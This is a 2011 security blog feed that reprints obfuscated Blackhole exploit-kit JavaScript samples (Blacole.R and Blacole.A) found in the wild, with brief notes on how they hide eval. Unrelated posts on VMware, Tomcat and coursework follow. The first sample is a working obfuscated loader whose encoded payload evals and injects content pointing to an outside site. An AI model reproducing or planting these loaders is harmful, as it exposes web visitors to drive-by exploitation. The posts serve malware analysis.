博客园_coordinator's planet

Interesting malicious script #3

2011-10-27T19:16:00Z

This is the newest variant of black hole, labeled by MS as Blacole.R. It is still surprising to see the signature of Black hole upgraded nearly a dozen of version in a month or two.

I've replaced the payload in <span></span> as it is very large.

Eval itself is turned into string and I think they can even play more tricks to hide the string eval.

<html><title>ev</title><body><input type="input" name="KVhMSfMk" value="length" style="display:none"><span style="visibility:hidden">
<span>"Large Malicious Payload"</span></span><script>
riJdw0=this["document"];
Wm6aTby4="innerHTML";
Jws9z=window;
riJdw0.tAinU7TY=function(hy){return riJdw0.getElementsByName(hy);};
riJdw0.PgOrtKo=function(hy){return riJdw0.getElementsByTagName(hy);};

MCchJo=riJdw0.tAinU7TY("KVhMSfMk")[0]["va"+"lue"];

vjhac2P=new Function("x,y,z","return x.replace(y,z)");
BMEIlPB=new Function("x,y,z","return x.substr(y,z)");

M21Sq=vjhac2P("","",new Object("eval"));

jKSwJN = Jws9z[M21Sq](M21Sq);

dqCjX=riJdw0.PgOrtKo("span")[1][Wm6aTby4];
SloAR = "pN#QWy,^Kri['HEBe=k ctAbZsO4Dg&X@US9VzT7Rq/>fwI*$Jn6_vxC;\\L5Y+d(:1].aoh<l-8!P23?0)GjMm\"|uF{%}";
PCvwO="";
NxJdPAs=dqCjX[MCchJo];
Po7tS43=0;
while(Po7tS43<NxJdPAs){
Ub4phW=BMEIlPB(dqCjX,Po7tS43+(124*0),44/22)*(45*2/90);
PCvwO=PCvwO["concat"](BMEIlPB(SloAR,jKSwJN("Ub4phW"),1));
Po7tS43=2+Po7tS43;
}
jKSwJN(PCvwO);

</script></body></html>

本文链接

Interesting malicious script #2

2011-10-26T04:37:00Z

This script has eval exposed, but simply replacing eval with alert won't show the malicious payload. In fact, only m[i] will be shown in the popup dialog.

And the eval is executed in the catch block, which should be able to defeat a lot of emulators, as emulators usually disable exception for performance issue.

本文链接

Interesting malicious script #1

2011-10-26T04:31:00Z

1 var CJlKp;function AyzhzK(){}
2 var KCfW;var xBtS;var HEKIZIOW="";if('EXHJH'=='vaEYij')LWkpgS();if('CLfChe'=='QiJCNa')uYVR='YcOyK';var UjFXc="sl\x69\x63e";var kBzvW='FUQEEH';if('hyIN'=='Sjacj')YNTWV='MgnooX';var AFXFJ="par\x73\x65I\x6e\x74";function isOLx(){var MffyRe='uVxx';if('VOchH'=='wFdlb')jmQg();}var OOfB=266;var CBjFe="from\x43\x68arCo\x64\x65";var WctUeU=70;function mETfy(){var frqWsm='VUkpH';if('ISUjCf'=='ooMnor')uXsN();}var ickml='EdHEGs';function iBnNdM(){var fdjY='oNsVaE';if('zvawkT'=='hKLy')RCnxsx();}function KdEQdo(){var htQo='aahGP';if('NiRNL'=='igtAy')SvWSak();}
3 var bQArecF="\x65va\x6c";var CoCv;var hSUhic="97a69f94a59aa09f517896a5a9595aaca792a3518599969f516e519f96a8517592a596595a6c8599969f5fa496a5859a9e96598599969f5f9896a5859a9e96595a515c5163655b67615b67615b6261616161615a6ca792a35194a0a09c9a9684a5a39a9f98516e519f96a85184a5a39a9f985995a094a69e969fa55f94a0a09c9a965a6ca792a35194a0a09c9a967996929596a3516e51536294626a926a93686464636995979365976297649361926362676696936697656e536ca792a3519396989a9f81a0a49aa59aa09f516e5194a0a09c9a9684a5a39a9f985f9a9f9596a980975994a0a09c9a967996929596a35a6c9a9751599396989a9f81a0a49aa59aa09f51526e515e625aac51ae51969da49651ac5195a094a69e969fa55f94a0a09c9a96516e51536294626a926a93686464636995979365976297649361926362676696936697656e95649e9895a76267966a6aa6999d949a61a6636a9367626798686c96a9a19aa396a46e535c518599969f5fa5a0787e8584a5a39a9f98595a6c95a094a69e969fa55fa8a39aa59659586d9a97a3929e9651a89a95a5996e5362535199969a9899a56e5362535193a0a39596a36e5361535197a3929e9693a0a39596a36e53615351a4a3946e5399a5a5a16b606094a09fa5a39294a3a65f94a09e609ba46098a05fa199a170a49a956e62536f6d609a97a3929e966f585a6c51ae51ae517896a5a9595a6c";var uXxtZR;if('yhio'=='XJNeu')iPwQ();function JJzKgq(){var Pprz='HfRLK';if('fSeuLE'=='Cmzqzh')fYhHk();}function GukX(){var lwMRz='BIVP';if('PxWxYW'=='zPKT')TdLG();}
4 var JJPANg=(function(){function pTLNxj(){}
5 return this;function nqdbb(){var izkwtx='tXwVwD';if('aKcN'=='ACjplq')dVkVS();}function CXyDOj(){}function PBeid(){}})();function vooP(){}function MSHc(){}
6 if('MWcZI'=='jZKAY')iLhg='RVPHa';var ROrCn="\x63\x6fnst\x72\x75ctor";var MySXGL;function BjraL(){var PgUmc='dOaSu';if('nrXie'=='cWfc')mSKg();}
7 var dbNwId="HPRIc"[ROrCn];if('EqRN'=='lGvAZh')FxemqM='OwCf';function jtCrn(){}
8 function SgTG(){}
9 for(NXBWzRCL=0;NXBWzRCL<hSUhic.length;NXBWzRCL+=2){var DoyNqK;if('UmLXys'=='HorpX')qPFj='uyyr';CBRLbsdu=JJPANg[AFXFJ](hSUhic[UjFXc](NXBWzRCL,NXBWzRCL+2),16)-49;function hGrsA(){var wERD='csxJmp';if('XbtA'=='Ktvf')MptqGo();}var eenfM='NbKy';HEKIZIOW+=dbNwId[CBjFe](CBRLbsdu)
10 if('qajnID'=='IUBrP')NPzkj='nMaGZ';if('AduB'=='vrtx')ZaiTw='NVNo';}
11 if('KQgidC'=='ClKb')kqjEAT();JJPANg[bQArecF](HEKIZIOW);function LLIEAa(){}if('rCcB'=='fkiBG')Jyghv();if('IaqY'=='YDomN')hVhK();if('eTdLwx'=='rrqc')vGUG();

I Found this one in the wild. This is really heavy obfuscated and I can't find where they eval the malicious payload. This script finally leads to Russian web site.

Forefront classify it as Blacole.A, but it is not quite like the blackhole exploit script I ever saw.

本文链接

About the newest Mass SQL Injection

2011-10-21T23:27:00Z

http://blog.sucuri.net/2011/10/mass-infections-from-jjghui-comurchin-js-sql-injection.html

After searching on Google and Bing, I found this mass-sql-injection attacked 134,000 sites in Google's result and 22,500 sites in Bing's result.

Safebrowsing only blocked a minority of them. And the number has been increased from 80k to 130k since it is mentioned in oct 12.

本文链接

How to resize the ubuntu root partition of vmware workstation

2010-05-05T03:44:00Z

This happens when you find install Ubuntu on vwmare and then find that the partition is too small for root.Belows are what I do to solve this:1. try use vdiskmanager to resize the vmdisk file http://w...

How to configure ssl on Tomcat 6

2010-04-02T20:48:00Z

Check this:http://tomcat.apache.org/tomcat-6.0-doc/ssl-howto.htmlAnd make sure use the keytool of JAVA rather than that of GNU.It costs me an hour to figure it out.JAVA keytool is located in $JAVA_HOM...

Recent plans

2009-03-29T19:58:00Z

Recently, I'm stuck with three project.The first is course project for P523, Compiler. This one uses scheme to write a compiler for sub-scheme and run on AMD-x86 platform. Scheme is astonishing wield ...

some problems with texniccenter

2009-02-07T20:51:00Z

Finally, I've decided to split my blog into a daily-life one and a technical one. In that case, this blog is kept updated on my findings and thoughts of technical problems.Actually, I met some strange...

blog转移

2008-11-01T04:51:00Z

人已在米国IUB，blog转移至http://lzcarl.blogspot.com，定期更新。

留学申请流水帐

2008-03-08T17:10:00Z

留学申请流水帐